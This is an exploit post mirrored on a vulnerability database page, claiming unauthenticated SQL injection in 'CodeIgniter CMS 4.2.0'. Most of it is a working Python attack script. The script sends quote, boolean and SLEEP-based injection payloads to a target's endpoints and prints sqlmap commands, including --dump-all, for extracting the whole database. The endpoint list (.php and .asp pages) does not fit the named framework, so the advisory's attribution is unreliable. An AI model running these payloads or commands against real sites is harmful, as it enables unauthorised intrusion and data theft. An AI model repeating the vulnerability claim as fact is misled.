Vulners
Lucene search
π CodeIgniter CMS 4.2.0 SQL Injection
ποΈΒ 28 Nov 2025Β 00:00:00Reported byΒ indoushkaTypeΒ 
Β packetstormπΒ packetstorm.newsπΒ 226Β Views
=============================================================================================================================================
| # Title : CodeIgniter CMS 4.2.0 SQL Injection Exploit |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://www.codeigniter.com/ |
=============================================================================================================================================
POC :
[+] References : https://packetstorm.news/files/id/167893/
[+] Summary :
multiple SQL Injection vulnerabilities in CodeIgniter CMS version 4.2.0.
The vulnerabilities affect various endpoints and parameters,
allowing unauthenticated attackers to execute arbitrary SQL queries and potentially compromise the entire database.
Multiple parameters across various endpoints fail to implement proper input sanitization, allowing SQL injection attacks through both GET and POST requests.
[+] POC : python poc.py
#!/usr/bin/env python3
"""
CodeIgniter CMS Version 4.2.0 SQL Injection Exploit
Author: indoushka
Vulnerability: SQL Injection in multiple parameters
"""
import requests
import sys
import urllib3
import time
from argparse import ArgumentParser
# Disable SSL warnings
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
class CodeIgniterExploit:
def __init__(self, target):
self.target = target.rstrip('/')
self.session = requests.Session()
self.session.headers.update({
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Connection': 'keep-alive'
})
def check_vulnerability(self):
"""Check if target is vulnerable to SQL Injection"""
print(f"[*] Checking vulnerability for: {self.target}")
# Test multiple vulnerable endpoints
endpoints = [
"/Job/searchResult/?title=123",
"/Job/searchResult/?title=test",
"/search.php?search=1",
"/news.php?p=7251",
"/employe/show.php?cvid=14088",
"/login/",
"/fa/index.asp?p=search&search=1",
"/fa/FormView/1026",
"/fa/formview/1030"
]
vulnerable_endpoints = []
for endpoint in endpoints:
# Test with single quote
test_url = f"{self.target}{endpoint}'"
try:
response = self.session.get(test_url, timeout=10, verify=False)
# Check for SQL error indicators
error_indicators = [
"SQL syntax",
"mysql_fetch",
"mysql_num_rows",
"ODBC Driver",
"Unclosed quotation mark",
"syntax error",
"MySQL server",
"Warning: mysql",
"PostgreSQL",
"ORA-",
"Microsoft OLE DB"
]
for error in error_indicators:
if error.lower() in response.text.lower():
print(f"[+] SQL Injection found in: {endpoint}")
vulnerable_endpoints.append(endpoint)
break
except Exception as e:
print(f"[-] Error testing {endpoint}: {e}")
continue
return vulnerable_endpoints
def exploit_boolean(self, endpoint):
"""Boolean-based blind SQL injection"""
print(f"[*] Testing boolean-based SQLi on: {endpoint}")
# Test boolean conditions
true_payload = f"{endpoint}' AND '1'='1"
false_payload = f"{endpoint}' AND '1'='2"
try:
true_response = self.session.get(f"{self.target}{true_payload}", timeout=10, verify=False)
false_response = self.session.get(f"{self.target}{false_payload}", timeout=10, verify=False)
if true_response.text != false_response.text:
print("[+] Boolean-based SQL Injection confirmed!")
return True
except Exception as e:
print(f"[-] Boolean test failed: {e}")
return False
def exploit_time_based(self, endpoint):
"""Time-based blind SQL injection"""
print(f"[*] Testing time-based SQLi on: {endpoint}")
time_payload = f"{endpoint}' AND SLEEP(5)--"
try:
start_time = time.time()
response = self.session.get(f"{self.target}{time_payload}", timeout=10, verify=False)
end_time = time.time()
if end_time - start_time >= 5:
print(f"[+] Time-based SQL Injection confirmed! (Delay: {end_time - start_time:.2f}s)")
return True
except Exception as e:
print(f"[-] Time-based test failed: {e}")
return False
def generate_sqlmap_commands(self, endpoints):
"""Generate sqlmap commands for automated exploitation"""
print("\n[+] SQLMap Commands:")
print("=" * 60)
for endpoint in endpoints:
url = f"{self.target}{endpoint}"
print(f"\n# For endpoint: {endpoint}")
print(f'sqlmap -u "{url}" --batch --level=5 --risk=3')
print(f'sqlmap -u "{url}" --batch --dbs')
print(f'sqlmap -u "{url}" --batch --current-db')
print(f'sqlmap -u "{url}" --batch --tables')
print(f'sqlmap -u "{url}" --batch --dump-all')
def comprehensive_scan(self):
"""Run comprehensive vulnerability scan"""
print("[*] Starting comprehensive CodeIgniter CMS scan...")
# Check vulnerability
vulnerable_endpoints = self.check_vulnerability()
if not vulnerable_endpoints:
print("[-] No SQL Injection vulnerabilities found")
return
print(f"\n[+] Found {len(vulnerable_endpoints)} vulnerable endpoints")
# Test exploitation methods on each endpoint
for endpoint in vulnerable_endpoints:
print(f"\n[*] Testing exploitation methods for: {endpoint}")
# Boolean-based
self.exploit_boolean(endpoint)
# Time-based
self.exploit_time_based(endpoint)
# Generate sqlmap commands
self.generate_sqlmap_commands(vulnerable_endpoints)
def main():
banner = """
βββββββ ββββββββββ βββββββ βββ ββββββββββββββ ββββββ βββ ββββββ
ββββββββ βββββββββββββββββββββββ ββββββββββββββ ββββββ ββββββββββββ
βββββββββ βββββ ββββββ ββββββ ββββββββββββββββββββββββββ ββββββββ
ββββββββββββββββββββββββ ββββββ ββββββββββββββββββββββββββ ββββββββ
ββββββ βββββββββββββββββββββββββββββββββββββββββββ ββββββ ββββββ βββ
ββββββ ββββββββββββ βββββββ βββββββ βββββββββββ ββββββ ββββββ βββ
CodeIgniter CMS 4.2.0 SQL Injection Exploit
By: indoushka
"""
print(banner)
parser = ArgumentParser(description='CodeIgniter CMS SQL Injection Exploit')
parser.add_argument('-u', '--url', required=True, help='Target URL (e.g., https://example.com)')
parser.add_argument('--check', action='store_true', help='Check vulnerability only')
parser.add_argument('--exploit', action='store_true', help='Run full exploitation')
parser.add_argument('--sqlmap', action='store_true', help='Generate sqlmap commands')
args = parser.parse_args()
exploit = CodeIgniterExploit(args.url)
if args.check:
vulnerable_endpoints = exploit.check_vulnerability()
if vulnerable_endpoints:
print(f"\n[!] Target is VULNERABLE - Found {len(vulnerable_endpoints)} endpoints")
else:
print("\n[!] Target does not appear to be vulnerable")
elif args.exploit:
exploit.comprehensive_scan()
elif args.sqlmap:
vulnerable_endpoints = exploit.check_vulnerability()
if vulnerable_endpoints:
exploit.generate_sqlmap_commands(vulnerable_endpoints)
else:
print("[-] No vulnerable endpoints found for sqlmap")
else:
# Default: comprehensive scan
exploit.comprehensive_scan()
if __name__ == "__main__":
if len(sys.argv) == 1:
print("Usage: python codeigniter_exploit.py -u https://target.com")
print("Options: --check, --exploit, --sqlmap")
sys.exit(1)
main()
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================Data
Build on a solid foundation withΒ Vulners data
WeΒ provide theΒ essential building blocks forΒ cybersecurity solutions withΒ comprehensive, structured, andΒ constantly updated vulnerability andΒ exploits data
Api
Power your application withΒ Vulners API
The Vulners REST API offers reliable, high-performance access toΒ vulnerabilityΒ intelligence, withΒ 99.9%Β SLAΒ uptime andΒ CDN-backed data delivery forΒ seamlessΒ global access
App
Assess and manage vulnerabilities withΒ VulnersΒ tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
28 Nov 2025 00:00Current
8.2High risk
Vulners AI Score8.2